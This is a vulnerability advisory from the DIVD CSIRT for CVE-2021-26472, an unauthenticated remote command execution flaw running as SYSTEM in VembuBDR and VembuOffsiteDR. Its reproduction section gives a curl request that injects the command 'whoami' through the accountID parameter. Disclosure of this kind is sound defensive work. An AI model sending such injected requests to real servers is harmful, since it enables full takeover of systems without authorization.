CVE-2021-26472 - Unauthenticated remote command execution with SYSTEM privileges in Vembu products

CVE	CVE-2021-26472
Case	DIVD-2020-00011
Discovered by	Wietse Boonstra
Credits	Discovered by Wietse Boonstra Addional research by Frank Breedijk
Products	VembuBDR: VembuBDR VembuOffsiteDR
Versions	VembuBDR: VembuBDR 4.2.x (= 4.2.0.1) 4.2.x (= 4.2.0) 4.1.x (= 4.1.0) 4.0.x (= 4.0.2) 4.0.x (= 4.0.1) 4.0.x (= 4.0.0) 3.9.x (= 3.9.1 Update1) 3.9.x (= 3.9.0 Update1) 3.9.x (= 3.9.0) 3.8.x (= 3.8.0) 3.7.x (= 3.7.0) 3.5.x (= 3.5.0.0) VembuOffsiteDR 4.2.x (= 4.2.0.1) 4.2.0
Page author	Frank Breedijk
CVSS	Base score: 10
References	https://csirt.divd.nl/cves/CVE-2021-26472/ https://csirt.divd.nl/cases/DIVD-2020-00011/ https://csirt.divd.nl/2021/05/11/Vembu-zero-days/ https://www.wbsec.nl/vembu
Last modified	20 Jun 2022 09:35

Description

In VembuBDR before 4.2.0.1 and VembuOffsiteDR before 4.2.0.1 installed on Windows, the http API located at /consumerweb/secure/download.php. Using this command argument an unauthenticated attacker can execute arbitrary OS commands with SYSTEM privileges.

How to reproduce

Step 1: Install a vulnerable product on Windows

Step 2: execute the following http request

$ curl 'http://local/consumerweb/secure/download.php?Action=ResellerTemplate&accountID=%26whoami'

Step 3: Result

Screenshot that proves RCE happened with SYSTEM privileges

Impact

This vulnerability allows an attacker to execute arbitrary windows commands with full system privileges. A.k.a. a full system compromise.

JSON version

DIVD CSIRT

CVE-2021-26472 - Unauthenticated remote command execution with SYSTEM privileges in Vembu products

Description

How to reproduce

Impact